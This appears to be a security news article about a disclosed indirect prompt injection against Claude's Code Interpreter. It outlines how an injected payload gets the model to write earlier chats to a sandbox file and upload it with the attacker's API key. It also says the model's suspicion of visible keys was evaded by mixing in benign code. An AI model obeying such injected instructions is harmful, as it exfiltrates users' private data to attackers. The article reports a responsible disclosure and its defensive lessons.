Hackers Can Manipulate Claude AI APIs With Indirect Prompts To Steal User Data

A new security issue discovered by researchers reveals that Anthropic’s Claude AI system can be exploited through indirect prompts, allowing attackers to exfiltrate user data via its built‑in File API.

The attack, documented in a detailed technical post on October 28, 2025, demonstrates how Claude’s Code Interpreter and API features could be manipulated to send sensitive information from a victim’s workspace to an attacker‑controlled account.

Attacker’s Anthropic Console before the attack

Abusing Claude’s File API

Anthropic recently enabled network access within Claude’s Code Interpreter, allowing users to fetch resources from approved package managers like npm, PyPI, and GitHub.

However, researchers found that one of the “approved” domains, api.anthropic.com, could be leveraged for malicious actions.

By inserting an indirect prompt injection payload into Claude’s chat, an attacker could make the AI model execute instructions without the user’s awareness.

The exploit begins by instructing Claude to write sensitive data, such as previous chat conversations, to a local file within its sandbox environment.

Attackers anthropic account now contain the exfiltrated file

The malicious payload then uses Anthropic’s File API to upload that file. Crucially, the code inserts the attacker’s API key, causing the upload to occur in the attacker’s Anthropic account rather than the user’s. This effectively transfers data out of the victim’s workspace.

Attackers can perform this process repeatedly to steal up to 30 MB per file upload, according to the File API’s documentation.

While initial tests showed inconsistent behavior due to Claude detecting suspicious activity in prompts containing visible API keys, the researcher managed to bypass these restrictions by mixing benign code segments within the payload, making the request appear harmless.

The discovery was disclosed to Anthropic via HackerOne on October 25, 2025, but the initial report was dismissed as “out of scope,” being categorized as a model safety issue rather than a security vulnerability.

The researcher argues that this classification is incorrect since the exploit allows deliberate exfiltration of private data using authenticated API calls, posing serious security implications rather than an accidental safety concern.

On October 30, Anthropic acknowledged the oversight and confirmed that data exfiltration attacks of this nature are indeed within the scope of responsible disclosure.

The company stated it is reviewing the misclassification process and urged users to monitor Claude’s behavior when executing scripts that access internal or sensitive data.

This incident highlights the growing overlap between AI safety and cybersecurity. As AI systems gain more integrated capabilities, including network access and memory functions, adversaries may find new ways to weaponize prompt injection techniques for data theft.

The case reinforces the need for rigorous monitoring, stricter egress controls, and clearer vulnerability handling procedures in AI platforms.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.

Source link

Search

Abusing Claude’s File API

Latest Posts